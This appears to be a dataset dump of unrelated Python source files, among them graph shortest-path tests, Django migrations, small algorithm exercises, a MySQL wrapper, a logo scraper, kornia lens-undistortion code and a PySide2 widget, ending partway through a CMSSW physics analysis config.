text stringlengths 38 1.54M |
|---|
# For each test case, simulate a running reserve that must stay at least k
# before every step; report the first index where it falls short.
for _case in range(int(input())):
    n, k = map(int, input().split())
    values = list(map(int, input().split()))
    reserve = [values[0]]
    fail_at = 0  # 0 means "no failure found yet"
    for idx in range(1, n):
        # The reserve must hold at least k before consuming step idx.
        if reserve[-1] < k:
            fail_at = idx
            break
        reserve.append(reserve[-1] + values[idx] - k)
    # The final reserve must also satisfy the threshold.
    if reserve[-1] < k and fail_at == 0:
        fail_at = n
    if fail_at:
        print('NO', fail_at)
    else:
        print('YES')
from __future__ import print_function
import unittest
import numpy
import nifty
import nifty.graph
class TestShortesetPath(unittest.TestCase):
    """Tests for nifty.graph's Dijkstra shortest-path bindings.

    NOTE(review): the class name contains a typo ("Shorteset"); kept
    unchanged so existing test selectors continue to match.
    """

    def graphAndWeights(self):
        """Build the shared fixture: a 6-node graph with a cheap detour.

        Edge weights default to 0; edges (0,1) and (1,2) cost 1 and the
        edge (4,5) costs 5, so the cheapest 0 -> 4 route is 0-1-2-3-4.
        """
        edges = numpy.array([
            [0,1],
            [1,2],
            [2,3],
            [3,4],
            [0,5],
            [4,5]
        ], dtype = 'uint64')
        g = nifty.graph.UndirectedGraph(6)
        g.insertEdges(edges)
        weights = numpy.zeros(len(edges), dtype = 'float32')
        weights[0] = 1.
        weights[1] = 1.
        weights[-1] = 5.
        return g, weights

    def testShortestPathDijkstraSingleTarget(self):
        """Single source/target query returns the node chain 0..4."""
        g, weights = self.graphAndWeights()
        sp = nifty.graph.ShortestPathDijkstra(g)
        path = sp.runSingleSourceSingleTarget(weights, 0, 4)
        # shortest path 0 -> 4:
        # 0 - 1, 1 - 2, 3 - 4
        self.assertEqual(len(path), 5, str(len(path)))
        # The binding returns the path target-first; reverse to source-first.
        path.reverse()
        for ii in range(5):
            self.assertEqual(path[ii], ii, "%i, %i" % (path[ii], ii))

    def testShortestPathDijkstraSingleTargetParallel(self):
        """The threaded variant must agree with the sequential result."""
        g, weights = self.graphAndWeights()
        N = 50
        sources = N * [0]
        targets = N * [4]
        parallelPaths = nifty.graph.shortestPathSingleTargetParallel(
            g,
            weights.tolist(),
            sources,
            targets,
            returnNodes=True,
            numberOfThreads=4
        )
        for path in parallelPaths:
            # shortest path 0 -> 4:
            # 0 - 1, 1 - 2, 3 - 4
            self.assertEqual(len(path), 5, str(len(path)))
            path.reverse()
            for ii in range(5):
                self.assertEqual(path[ii], ii, "%i, %i" % (path[ii], ii))

    def testShortestPathDijkstraMultiTarget(self):
        """One source, several targets; the solver object must be reusable."""
        g, weights = self.graphAndWeights()
        sp = nifty.graph.ShortestPathDijkstra(g)
        # we need to check 2 times to make sure that more than 1 runs work
        for _ in range(2):
            paths = sp.runSingleSourceMultiTarget(weights, 0, [4,5])
            self.assertEqual(len(paths), 2)
            # shortest path 0 -> 4:
            # 0 - 1, 1 - 2, 3 - 4
            path = paths[0]
            path.reverse()
            self.assertEqual(len(path), 5, str(len(path)))
            for ii in range(5):
                self.assertEqual(path[ii], ii, "%i, %i" % (path[ii], ii))
            # shortest path 0 -> 5:
            # 0 - 5
            path = paths[1]
            path.reverse()
            self.assertEqual(len(path) , 2, str(len(path)))
            self.assertEqual(path[0] , 0, str(path[0]))
            self.assertEqual(path[1] , 5, str(path[1]))

    def testShortestPathDijkstraMultiTargetParallel(self):
        """Threaded multi-target variant, run twice to check reusability."""
        g, weights = self.graphAndWeights()
        N = 50
        sources = N*[0]
        targets = [[4,5] for _ in range(N)]
        for _ in range(2):
            parallelPaths = nifty.graph.shortestPathMultiTargetParallel(
                g,
                weights,
                sources,
                targets,
                returnNodes=True,
                numberOfThreads=5
            )
            for paths in parallelPaths:
                self.assertEqual(len(paths), 2)
                # shortest path 0 -> 4:
                # 0 - 1, 1 - 2, 3 - 4
                path = paths[0]
                path.reverse()
                self.assertEqual(len(path), 5, str(len(path)))
                for ii in range(5):
                    self.assertEqual(path[ii] , ii, "%i, %i" % (path[ii], ii))
                # shortest path 0 -> 5:
                # 0 - 5
                path = paths[1]
                path.reverse()
                self.assertEqual(len(path) , 2, str(len(path)))
                self.assertEqual(path[0] , 0, str(path[0]))
                self.assertEqual(path[1] , 5, str(path[1]))

    def testShortestPathInvalid(self):
        """A query between disconnected components yields an empty path."""
        edges = numpy.array([
            [0,1],
            [2,3]
        ], dtype = 'uint64')
        g = nifty.graph.UndirectedGraph(4)
        g.insertEdges(edges)
        sp = nifty.graph.ShortestPathDijkstra(g)
        weights = [1.,1.]
        path = sp.runSingleSourceSingleTarget(weights, 0, 3)
        self.assertTrue(not path) # make sure that the path is invalid


if __name__ == '__main__':
    unittest.main()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-10-30 16:09
from __future__ import unicode_literals

from django.db import migrations


class Migration(migrations.Migration):
    """Empty placeholder migration depending on two board 0013 migrations.

    NOTE(review): the dependency '0013_TimeStampeModel modified_time'
    contains a space and a likely typo ("TimeStampe") -- confirm it matches
    an actual migration file on disk.
    """

    dependencies = [
        ('board', '0013_edited_post_history'),
        ('board', '0013_TimeStampeModel modified_time'),
    ]

    operations = []
import qrcode
import io
import sys
import os

# Destination for the generated QR image on the device.
QR_PATH = "/home/pi/kcb-config/scripts/qrcode.png"

# Remove any stale image from a previous run.
if os.path.isfile(QR_PATH):
    os.remove(QR_PATH)

# The payload to encode is the first command-line argument.
payload = sys.argv[1]

code = qrcode.QRCode(
    version=1,
    error_correction=qrcode.constants.ERROR_CORRECT_L,
    box_size=10,
    border=4,
)
code.add_data(payload)
code.make(fit=True)
code.make_image(fill_color='black', back_color='white').save(QR_PATH)
#!/usr/bin/python3
"https://www.youtube.com/watch?v=EeQ8pwjQxTM"
def merge_sort(list1):
    """Sort `list1` in place with merge sort, logging each split (demo)."""
    print("Splitting: ", list1)
    if len(list1) <= 1:
        return
    mid = len(list1) // 2
    left, right = list1[:mid], list1[mid:]
    merge_sort(left)
    merge_sort(right)
    # Merge the two sorted halves back into list1.
    i = j = 0
    for k in range(len(list1)):
        # Take from the left half while it holds the smaller front element,
        # or when the right half is exhausted.
        if j >= len(right) or (i < len(left) and left[i] < right[j]):
            list1[k] = left[i]
            i += 1
        else:
            list1[k] = right[j]
            j += 1


# Demo run from the referenced tutorial video.
list1 = [54, 26, 93, 17, 77, 31, 44, 55, 20]
merge_sort(list1)
print(list1)
|
# Bridge-crossing trucks (Programmers "truck on a bridge" problem).
def solution(bridge_length, weight, truck_weights):
    """Simulate trucks crossing a bridge one unit of distance per second.

    Args:
        bridge_length: number of time steps a truck needs to cross.
        weight: maximum total weight allowed on the bridge at once.
        truck_weights: weights of the trucks, in crossing order.

    Returns:
        Total seconds until the last truck has left the bridge.
    """
    answer = 0  # elapsed seconds
    on_bridge = {}  # truck index -> [weight, distance travelled]
    i = 0  # index of the next truck waiting to enter
    finished = 0  # number of trucks that completed the crossing
    while True:
        if finished == len(truck_weights):
            # Bugfix: the original print lacked the f-prefix, so the
            # placeholder was emitted literally instead of the count.
            print(f"트럭이 모두 다리를 건넜습니다 {finished}")
            break
        answer += 1
        print(f'{answer} 초')
        # Current load on the bridge (renamed from `sum`, which shadowed
        # the builtin).
        total = 0
        for w, _ in on_bridge.values():
            total += w
        print(f'트럭 무게의 합 {total}')
        # Let the next truck enter if the bridge can still carry it.
        if i < len(truck_weights) and total + truck_weights[i] <= weight:
            on_bridge[i] = [truck_weights[i], 0]
            i += 1
        # Advance every truck one step; remove those reaching the far end.
        # Iterate over a snapshot of the keys because we pop while looping.
        for key in list(on_bridge.keys()):
            print(f'{i} {on_bridge}')
            on_bridge[key][1] += 1
            if on_bridge[key][1] == bridge_length:
                print(f"빠지는 트럭 {on_bridge[key][0]}")
                on_bridge.pop(key)
                finished += 1
    # One extra second for the final truck to actually leave the bridge.
    answer += 1
    print(f'while이 끝난 뒤 second {answer}')
    print(on_bridge)
    return answer


bridge_length = 2
weight = 10
truck_weights = [7, 4, 5, 6]
print(solution(bridge_length, weight, truck_weights))
from lib.core.config import *
from lib.core.logger import log
import pymysql
class MyMysql(object):
    """Thin convenience wrapper around a pymysql connection.

    Connection parameters come from the project's MySQL config section;
    query results are returned as dicts via DictCursor.
    """

    def __init__(self):
        # Load the MySQL section of the project configuration and connect.
        conf = Configure().read(ConfType.MYSQL)
        self.config = conf
        self.db = pymysql.connect(**conf)
        self.cursor = self.db.cursor(cursor=pymysql.cursors.DictCursor)

    @log(7)
    def execute_sql(self, sql):
        """Run a write statement, commit, and return the affected row count."""
        affected = self.cursor.execute(sql)
        self.db.commit()
        return affected

    @log(3)
    def query_data(self, sql):
        """Run a read statement and return all rows."""
        self.cursor.execute(sql)
        return self.cursor.fetchall()

    def __del__(self):
        # Best-effort close of the underlying connection on GC.
        self.db.close()


if __name__ == '__main__':
    MyMysql().query_data("SELECT *FROM zt_bug;")
|
from class1 import Car
if __name__ == "__main__":
car_1 = Car("KA013060",4)
car_2 = Car("KA013060",5)
car_3 = Car("KA013060",6)
car_4 = Car("KA013060",4)
car_5 = Car("KA013060",4)
car_1.start()
car_2.start()
car_3.start()
car_1.change_gear()
car_2.change_gear()
car_3.change_gear()
car_2.change_gear()
car_4.change_gear()
lst = [car_1,car_2,car_3,car_4,car_5]
for car in lst:
car.showInfo()
c = len(list(filter(lambda x:x.is_started and x.c_gear)))
print(c)
|
#Docdb 20515
import os,sys,string,time
from csv import reader
import numpy as np
def cummulate(a, lifetime=100):
    """Rolling sum of `a` over a trailing window of `lifetime` entries.

    b[i] is the sum of a[max(0, i - lifetime + 1) .. i], i.e. the amount of
    data still "alive" in year i given the retention lifetime.

    Args:
        a: 1-D numeric array (one entry per year).
        lifetime: retention window in years. Values below 1 are treated as
            a plain scaling factor (fractional copies), matching the
            spreadsheet convention; assumed to be an integer when >= 1.

    Returns:
        numpy array of the same length as `a`.
    """
    if lifetime < 1:
        # Fractional lifetime: interpret as a scale factor, not a window.
        return a * lifetime
    # Prefix sums turn the original O(n * lifetime) double loop into O(n);
    # the leftover per-iteration debug print was removed.
    running = np.cumsum(a)
    b = np.zeros(len(a))
    for i in range(len(a)):
        begin = max(0, i - lifetime + 1)
        b[i] = running[i] - (running[begin - 1] if begin > 0 else 0.0)
    return b
def dump(n, k, a):
    """Format one CSV row: label, quantity name with its unit, then values.

    Relies on the module-level `Units` mapping for the unit suffix.
    """
    cells = ["%5s, %10s (%s)" % (n, k, Units[k])]
    for value in a:
        cells.append("%8.1f" % value)
    return ", ".join(cells) + "\n"
# --- Input tables and unit / retention assumptions -----------------------
Years = np.array([2018,2019,2020,2021,2022,2023,2024,2025,2026,2027,2028,2029,2030])
size = len(Years)
# Display units for each quantity.
Units = {"Events":"M", "Raw":"TB", "Test":"TB","Reco":"TB","CPU":"MHr","Sim Events":"M","Sim":"TB","Sim-CPU":"MHr","All":"TB"}
# Retention (years) per storage category; values < 1 act as scale factors
# inside cummulate().
TapeLifetimes = {"Raw":100,"Test":.5,"Reco":15,"Sim":15}
DiskLifetimes = {"Raw":1,"Test":.5,"Reco":2,"Sim":2}
# Number of copies kept on each medium.
TapeCopies = {"Raw":2,"Test":.5,"Reco":1,"Sim":1}
DiskCopies = {"Raw":1,"Test":.5,"Reco":2,"Sim":2}
# Multiplier applied per quantity when summing across detectors.
PerYear = {"Raw":1,"Test":1,"Reco":2,"Sim":1,"Events":1,"Sim Events":1,"CPU":2,"Sim-CPU":1}
StorageTypes = ["Raw","Test","Reco","Sim"]

# Parse the input table: rows look like (detector, quantity, v2018, ...).
Inputs = {}
data = []
file = open("Numbers-2020-11-28.csv",'r')
for line in reader(file):
    # Skip the header row and rows with no detector label.
    if line[1] == "Year":
        continue
    print (line)
    if line[0] == "":
        continue
    data = []
    if (line[0] not in Inputs):
        Inputs[line[0]] = {}
    # Columns 2..14 hold one value per year; stop at the first blank cell.
    for i in range(2,15):
        if line[i] == '':
            break
        data.append(float(line[i]))
    print (data)
    Inputs[line[0]][line[1]] = np.array(data)
    print (line[0], line[1], Inputs[line[0]][line[1]])

# Write per-detector rows and accumulate totals across detectors.
# NOTE(review): Totals is keyed off Inputs["ND"] -- assumes every detector
# reports the same quantities as "ND"; confirm against the input file.
o = open("out.csv",'w')
Totals = {}
for k in Inputs["ND"].keys():
    Totals[k] = np.zeros(size)
for i in Inputs.keys():
    for k in Inputs[i].keys():
        # print ("%d%di,k, len(Inputs[i][k]))
        Totals[k] = Totals[k] + Inputs[i][k]*PerYear[k]
        o.write(dump(i,k,Inputs[i][k]))
# for j in Inputs[i]:
## print (i, j, len(Inputs[i][j]), Inputs[i][j])
# o.write ("%4s, %10s (%3s)"%(i,j,Units[j]))
#
# for k in range(0,size):
# o.write(", ")
# o.write ("%8.1f"%Inputs[i][j][k])
# o.write("\n")
for k in Totals:
    print ("total:",k,Units[k], Totals[k])
    o.write(dump("Total",k,Totals[k]))
# o.write ("Total %10s (%3s)"%(k,Units[k]))
# for j in range(0,size):
# o.write(", ")
# o.write ("%8.1f"%Totals[k][j])
# o.write("\n")

# Apply copy counts and retention lifetimes to get per-year media needs.
Tape = {}
CummulativeTape = {}
Disk = {}
CummulativeDisk = {}
#Tape["Raw"] = Totals["Raw"]*2
#CummulativeTape["Raw"] = cummulate(Tape["Raw"],100)
#o.write(dump("Tape","Raw",CummulativeTape["Raw"]))
#Tape["Reco"] = Totals["Reco"]
#CummulativeTape["Reco"] = cummulate(Tape["Reco"],2)
TotalTape = np.zeros(size)
TotalDisk = np.zeros(size)
for k in StorageTypes:
    Tape[k] = Totals[k]*TapeCopies[k]
    o.write(dump("Tape Copies",k,Tape[k]))
    Disk[k] = Totals[k]*DiskCopies[k]
    o.write(dump("Disk Copies",k,Disk[k]))
    CummulativeTape[k] = cummulate(Tape[k],TapeLifetimes[k])
    o.write(dump("Cummulative Tape Copies",k,CummulativeTape[k]))
    CummulativeDisk[k] = cummulate(Disk[k],DiskLifetimes[k])
    o.write(dump("Cummulative Disk Copies",k,CummulativeDisk[k]))
    TotalTape += CummulativeTape[k]
    TotalDisk += CummulativeDisk[k]
o.write(dump("Cummulative Tape","All",TotalTape))
o.write(dump("Cummulative Disk","All",TotalDisk))
|
# Generated by Django 3.1.1 on 2020-10-13 10:54
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):
    """Repoint FilmVotes.mark at the Vote model with cascading deletes."""

    dependencies = [
        ('uakinotv', '0003_auto_20201012_2342'),
    ]

    operations = [
        migrations.AlterField(
            model_name='filmvotes',
            name='mark',
            field=models.ForeignKey(
                on_delete=django.db.models.deletion.CASCADE,
                to='uakinotv.vote',
                verbose_name='Оцінка',
            ),
        ),
    ]
|
from bs4 import BeautifulSoup
from urllib2 import urlopen
import urllib
# adapted from https://github.com/nateberman/Python-WebImageScraper
# NOTE: Python 2 code (urllib2 / urllib.urlretrieve).
def make_soup(url):
    """Fetch `url` and parse the response body with BeautifulSoup."""
    return BeautifulSoup(urlopen(url).read(), "html.parser")


def get_colleges(url):
    """Return parallel lists of college names (underscored) and page links."""
    soup = make_soup(url)
    anchors = soup.findAll("a", "bi")
    names = [a.get_text().replace(" ", "_") for a in anchors]
    links = [a.get('href') for a in anchors]
    return names, links


def get_logos(url):
    """Download the logo of every college listed at `url`."""
    names, links = get_colleges(url)
    for name, link in zip(names, links):
        get_logo(name, link)


def get_logo(name, link):
    """Save the first 'brand-logo' image found on `link` as logos/<name>.png."""
    soup = make_soup(link)
    holders = [p for p in soup.findAll(True, {'class': ['brand-logo']})]
    img_url = holders[0].findAll("img")[0].get("src")
    urllib.urlretrieve(img_url, 'logos/' + name + '.png')


get_logos('http://www.espn.com/college-football/teams')
import pytest, json
from pprint import pprint
def test_wellformedjson():
data = json.load(open('simplewellformed.json'))
# pprint(data)
# data["maps"][0]["id"]
# data["masks"]["id"]
# print data["om_points"]
assert data["om_points"] == 'value'
assert bool(1) is True
def func(x):
    """Return x incremented by one."""
    return x + 1


def test_answer():
    # Bugfix: the expected value was 5, but func(3) returns 4, so the
    # test failed unconditionally.
    assert func(3) == 4
|
# Program name: r2
# Time limit: 1 second
# The average m of r1 and r2 is
#   m = (r1 + r2) / 2
# We know r1 and m but forgot r2. Find r2.
# Input
#
# Integers r1 and m are given; both are between -1000 and 1000 inclusive.
# Output
#
# Print r2.
# Sample input/output
#
# Input
#
# 11 15
#
# Output
#
# 19
#
# Input
#
# 4 3
#
# Output
#
# 2
# Source: COCI 2006
# From m = (r1 + r2) / 2 it follows directly that r2 = 2*m - r1.
r1, m = map(int, input().split())
print(2 * m - r1)
#
# module tank.core.tf
#
# Terraform-related code.
#
from os.path import dirname, isdir
from cement.utils import fs
from tank.core import resource_path
from tank.core.exc import TankError, TankTestCaseError
from tank.core.testcase import TestCase
class PlanGenerator:
    """
    Generates a Terraform plan for the run based on the testcase and the user settings.
    """

    def __init__(self, app, testcase: TestCase):
        self._app = app
        self.testcase = testcase

        # Fail fast when no templates ship for the configured provider.
        if not isdir(self._provider_templates):
            raise TankError('Failed to find Terraform templates for cloud provider {} at {}'.format(
                self._app.cloud_settings.provider.value, self._provider_templates
            ))

    def generate(self, plan_dir: str):
        """Render the provider templates for this testcase into `plan_dir`."""
        # Size the monitoring node with the number of instances under test.
        instance_count = self.testcase.total_instances
        if instance_count <= 10:
            monitoring_machine_type = 'small'
        elif instance_count < 50:
            monitoring_machine_type = 'standard'
        else:
            monitoring_machine_type = 'large'

        self._app.template.copy(self._provider_templates, plan_dir, {
            'instances': self.testcase.instances,
            'monitoring_machine_type': monitoring_machine_type,
        })

    @property
    def _provider_templates(self) -> str:
        """Path to the bundled templates for the configured cloud provider."""
        return resource_path('providers', self._app.cloud_settings.provider.value)
|
import re
import unittest
# Pragmatic e-mail pattern: dotted local part, dotted domain labels, and a
# 2-6 letter TLD with an optional two-letter country suffix.
EMAIL_PATTERN = re.compile(r'^([\w-]+(?:\.[\w-]+)*)@((?:[\w-]+\.)*\w[\w-]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$')


class Email:
    """Value object wrapping a syntactically valid e-mail address."""

    def __init__(self, email):
        if not EMAIL_PATTERN.match(email):
            raise ValueError('Invalid email')
        self.email = email
class Person:
    """A person with a first name, last name and a validated e-mail.

    Raises:
        TypeError: when any argument is not a string.
        ValueError: when the e-mail address is malformed (via Email).
    """

    def __init__(self, first_name, last_name, email):
        # Fix: the original used `assert` for argument validation, which is
        # silently stripped under `python -O`; raise explicitly instead.
        if not isinstance(first_name, str):
            raise TypeError('first_name must be a str')
        if not isinstance(last_name, str):
            raise TypeError('last_name must be a str')
        if not isinstance(email, str):
            raise TypeError('email must be a str')
        self.first_name = first_name
        self.last_name = last_name
        self.email = Email(email)
class PersonTests(unittest.TestCase):
    """Behavioral tests for Person/Email validation."""

    def test_valid_email(self):
        # Construction must succeed for a well-formed address.
        Person('Jan', 'Kowalski', 'jan@kowalski.pl')

    def test_invalid_email(self):
        # A malformed address must be rejected with ValueError.
        with self.assertRaises(ValueError):
            Person('Jan', 'Kowalski', 'invalid email')


if __name__ == "__main__":
    unittest.main()
|
from __future__ import annotations
import torch
from kornia.geometry.linalg import transform_points
from kornia.geometry.transform import remap
from kornia.utils import create_meshgrid
from .distort import distort_points, tilt_projection
# Based on https://github.com/opencv/opencv/blob/master/modules/calib3d/src/undistort.dispatch.cpp#L384
def undistort_points(
    points: torch.Tensor, K: torch.Tensor, dist: torch.Tensor, new_K: torch.Tensor | None = None, num_iters: int = 5
) -> torch.Tensor:
    r"""Compensate for lens distortion a set of 2D image points.

    Radial :math:`(k_1, k_2, k_3, k_4, k_5, k_6)`,
    tangential :math:`(p_1, p_2)`, thin prism :math:`(s_1, s_2, s_3, s_4)`, and tilt :math:`(\tau_x, \tau_y)`
    distortion models are considered in this function.

    Args:
        points: Input image points with shape :math:`(*, N, 2)`.
        K: Intrinsic camera matrix with shape :math:`(*, 3, 3)`.
        dist: Distortion coefficients
            :math:`(k_1,k_2,p_1,p_2[,k_3[,k_4,k_5,k_6[,s_1,s_2,s_3,s_4[,\tau_x,\tau_y]]]])`. This is
            a vector with 4, 5, 8, 12 or 14 elements with shape :math:`(*, n)`.
        new_K: Intrinsic camera matrix of the distorted image. By default, it is the same as K but you may additionally
            scale and shift the result by using a different matrix. Shape: :math:`(*, 3, 3)`. Default: None.
        num_iters: Number of undistortion iterations. Default: 5.

    Returns:
        Undistorted 2D points with shape :math:`(*, N, 2)`.

    Example:
        >>> _ = torch.manual_seed(0)
        >>> x = torch.rand(1, 4, 2)
        >>> K = torch.eye(3)[None]
        >>> dist = torch.rand(1, 4)
        >>> undistort_points(x, K, dist)
        tensor([[[-0.1513, -0.1165],
                 [ 0.0711,  0.1100],
                 [-0.0697,  0.0228],
                 [-0.1843, -0.1606]]])
    """
    # Bugfix: the two conditions were joined with `and`, so a tensor whose
    # last dimension is not 2 (e.g. (B, N, 3)) slipped through validation.
    if points.dim() < 2 or points.shape[-1] != 2:
        raise ValueError(f'points shape is invalid. Got {points.shape}.')
    if K.shape[-2:] != (3, 3):
        raise ValueError(f'K matrix shape is invalid. Got {K.shape}.')
    if new_K is None:
        new_K = K
    elif new_K.shape[-2:] != (3, 3):
        raise ValueError(f'new_K matrix shape is invalid. Got {new_K.shape}.')
    if dist.shape[-1] not in [4, 5, 8, 12, 14]:
        raise ValueError(f"Invalid number of distortion coefficients. Got {dist.shape[-1]}")

    # Adding zeros to obtain vector with 14 coeffs.
    if dist.shape[-1] < 14:
        dist = torch.nn.functional.pad(dist, [0, 14 - dist.shape[-1]])

    # Convert 2D points from pixels to normalized camera coordinates
    cx: torch.Tensor = K[..., 0:1, 2]  # princial point in x (Bx1)
    cy: torch.Tensor = K[..., 1:2, 2]  # princial point in y (Bx1)
    fx: torch.Tensor = K[..., 0:1, 0]  # focal in x (Bx1)
    fy: torch.Tensor = K[..., 1:2, 1]  # focal in y (Bx1)

    # This is equivalent to K^-1 [u,v,1]^T
    x: torch.Tensor = (points[..., 0] - cx) / fx  # (BxN - Bx1)/Bx1 -> BxN
    y: torch.Tensor = (points[..., 1] - cy) / fy  # (BxN - Bx1)/Bx1 -> BxN

    # Compensate for tilt distortion
    if torch.any(dist[..., 12] != 0) or torch.any(dist[..., 13] != 0):
        inv_tilt = tilt_projection(dist[..., 12], dist[..., 13], True)
        # Transposed untilt points (instead of [x,y,1]^T, we obtain [x,y,1])
        x, y = transform_points(inv_tilt, torch.stack([x, y], dim=-1)).unbind(-1)

    # Iteratively undistort points
    x0, y0 = x, y
    for _ in range(num_iters):
        r2 = x * x + y * y

        inv_rad_poly = (1 + dist[..., 5:6] * r2 + dist[..., 6:7] * r2 * r2 + dist[..., 7:8] * r2**3) / (
            1 + dist[..., 0:1] * r2 + dist[..., 1:2] * r2 * r2 + dist[..., 4:5] * r2**3
        )
        deltaX = (
            2 * dist[..., 2:3] * x * y
            + dist[..., 3:4] * (r2 + 2 * x * x)
            + dist[..., 8:9] * r2
            + dist[..., 9:10] * r2 * r2
        )
        deltaY = (
            dist[..., 2:3] * (r2 + 2 * y * y)
            + 2 * dist[..., 3:4] * x * y
            + dist[..., 10:11] * r2
            + dist[..., 11:12] * r2 * r2
        )

        x = (x0 - deltaX) * inv_rad_poly
        y = (y0 - deltaY) * inv_rad_poly

    # Convert points from normalized camera coordinates to pixel coordinates
    new_cx: torch.Tensor = new_K[..., 0:1, 2]  # princial point in x (Bx1)
    new_cy: torch.Tensor = new_K[..., 1:2, 2]  # princial point in y (Bx1)
    new_fx: torch.Tensor = new_K[..., 0:1, 0]  # focal in x (Bx1)
    new_fy: torch.Tensor = new_K[..., 1:2, 1]  # focal in y (Bx1)
    x = new_fx * x + new_cx
    y = new_fy * y + new_cy
    return torch.stack([x, y], -1)
# Based on https://github.com/opencv/opencv/blob/master/modules/calib3d/src/undistort.dispatch.cpp#L287
def undistort_image(image: torch.Tensor, K: torch.Tensor, dist: torch.Tensor) -> torch.Tensor:
    r"""Compensate an image for lens distortion.

    Radial :math:`(k_1, k_2, k_3, k_4, k_5, k_6)`,
    tangential :math:`(p_1, p_2)`, thin prism :math:`(s_1, s_2, s_3, s_4)`, and tilt :math:`(\tau_x, \tau_y)`
    distortion models are considered in this function.

    Args:
        image: Input image with shape :math:`(*, C, H, W)`.
        K: Intrinsic camera matrix with shape :math:`(*, 3, 3)`.
        dist: Distortion coefficients
            :math:`(k_1,k_2,p_1,p_2[,k_3[,k_4,k_5,k_6[,s_1,s_2,s_3,s_4[,\tau_x,\tau_y]]]])`. This is
            a vector with 4, 5, 8, 12 or 14 elements with shape :math:`(*, n)`.

    Returns:
        Undistorted image with shape :math:`(*, C, H, W)`.

    Example:
        >>> img = torch.rand(1, 3, 5, 5)
        >>> K = torch.eye(3)[None]
        >>> dist_coeff = torch.rand(1, 4)
        >>> out = undistort_image(img, K, dist_coeff)
        >>> out.shape
        torch.Size([1, 3, 5, 5])
    """
    if len(image.shape) < 3:
        raise ValueError(f"Image shape is invalid. Got: {image.shape}.")
    if K.shape[-2:] != (3, 3):
        raise ValueError(f'K matrix shape is invalid. Got {K.shape}.')
    if dist.shape[-1] not in [4, 5, 8, 12, 14]:
        raise ValueError(f'Invalid number of distortion coefficients. Got {dist.shape[-1]}.')
    if not image.is_floating_point():
        raise ValueError(f'Invalid input image data type. Input should be float. Got {image.dtype}.')
    if image.shape[:-3] != K.shape[:-2] or image.shape[:-3] != dist.shape[:-1]:
        # Input with image shape (1, C, H, W), K shape (3, 3), dist shape (4)
        # allowed to avoid a breaking change.
        if not all((image.shape[:-3] == (1,), K.shape[:-2] == (), dist.shape[:-1] == ())):
            raise ValueError(
                f'Input shape is invalid. Input batch dimensions should match. '
                f'Got {image.shape[:-3]}, {K.shape[:-2]}, {dist.shape[:-1]}.'
            )

    channels, rows, cols = image.shape[-3:]
    # Flattened batch size (product of all leading dimensions).
    B = image.numel() // (channels * rows * cols)

    # Create point coordinates for each pixel of the image
    xy_grid: torch.Tensor = create_meshgrid(rows, cols, False, image.device, image.dtype)
    pts = xy_grid.reshape(-1, 2)  # (rows*cols)x2 matrix of pixel coordinates

    # Distort points and define maps: sampling at the distorted location of
    # each output pixel yields the undistorted image.
    ptsd: torch.Tensor = distort_points(pts, K, dist)  # Bx(rows*cols)x2
    mapx: torch.Tensor = ptsd[..., 0].reshape(B, rows, cols)  # B x rows x cols, float
    mapy: torch.Tensor = ptsd[..., 1].reshape(B, rows, cols)  # B x rows x cols, float

    # Remap image to undistort
    out = remap(image.reshape(B, channels, rows, cols), mapx, mapy, align_corners=True)
    return out.view_as(image)
|
from PySide2.QtWidgets import QWidget, QDesktopWidget
from PySide2.QtGui import QPainter,QColor,QFont
from field_map.map import FieldMap
class Minimap(QWidget):
    """Widget rendering a scaled top-down view of the FieldMap.

    The map is scaled so its width spans 60% of the screen height; while the
    cursor is inside the widget, the hovered map coordinate is echoed.
    """

    def __init__(self):
        super().__init__()
        self.map = FieldMap()
        # Receive mouseMoveEvent even when no button is pressed.
        self.setMouseTracking(True)
        self.hover_x = 0
        self.hover_y = 0
        self.showCoordinate = False
        # Pixels per map unit.
        self.scale = QDesktopWidget().screenGeometry().height() * 0.6 / self.map.width
        # NOTE(review): these assignments shadow QWidget.width()/height();
        # confirm nothing relies on calling the Qt accessors on this widget.
        self.width = self.map.length * self.scale
        self.height = self.map.width * self.scale
        self.setFixedSize(self.width, self.height)
        self.zoom = 1  # reserved for the zoom slider (see TODO below)

    def paintEvent(self, event):
        qp = QPainter()
        qp.begin(self)
        try:
            self.paintMap(qp)
        finally:
            # Always release the painter, even if painting raises.
            qp.end()

    def mouseMoveEvent(self, event):
        # Track the cursor and repaint so the coordinate label follows it.
        self.hover_x = event.x()
        self.hover_y = event.y()
        self.repaint()

    def enterEvent(self, event):
        self.showCoordinate = True

    def leaveEvent(self, event):
        self.showCoordinate = False
        self.repaint()

    def paintMap(self, qp):
        """Draw the white map background and the hovered map coordinate."""
        rect = self.rect()
        qp.setBrush(QColor(255, 255, 255))
        assert rect.x() == 0
        assert rect.y() == 0
        scaled_origin_x = rect.x()
        scaled_origin_y = rect.y()
        qp.drawRect(scaled_origin_x, scaled_origin_y, self.width, self.height)
        if self.showCoordinate:
            if self.hover_x < self.width and self.hover_y < scaled_origin_y + self.height:
                # Map y grows upward, opposite to Qt's pixel y axis.
                qp.drawText(QFont().pointSize(), QFont().pointSize() * 2, # 1em offset from both sides
                    f"{round(self.hover_x/self.scale,2)},{round((rect.height()-self.hover_y)/self.scale,2)}")
        # TODO: draw axis
        # TODO: implement zoom slide bar


__all__=['Minimap']
|
# Base classes whose subclasses are treated as project models.
MODEL_BASE_CLASSES = ["Model", "TimeStampedModel"]
# Attribute names to ignore when scanning model definitions.
SKIP_LIST = ['today', 'objects', 'verbose_name']
# Location of the models module to analyse.
MODEL_FILE_LOCATION = "project_code/models.py"
import FWCore.ParameterSet.Config as cms
# import config for event selection, event print-out and analysis sequence
from TauAnalysis.Configuration.analyzeAHtoElecMu_cfi import *
# CMSSW configuration: event selection chain, histogram managers and event
# dumps for the A/H -> e + mu analysis.
analyzeAHtoElecMuEvents = cms.EDAnalyzer("GenericAnalyzer",

    name = cms.string('ahElecMuAnalyzer'),

    # Cuts are applied in list order; an event must pass all of them.
    filters = cms.VPSet(
        # generator level phase-space selection
        # (NOTE: (1) to be used in case of Monte Carlo samples
        #            overlapping in simulated phase-space only !!
        #        (2) genPhaseSpaceCut needs to be **always** the first entry in the list of cuts
        #            - otherwise the script submitToBatch.csh for submission of cmsRun jobs
        #            to the CERN batch system will not work !!)
        genPhaseSpaceCut,

        # generator level selection of Z --> e + mu events
        # passing basic acceptance and kinematic cuts
        # (NOTE: to be used for efficiency studies only !!)
        #genElectronCut,
        #genMuonCut,

        # trigger selection
        evtSelTrigger,

        # primary event vertex selection
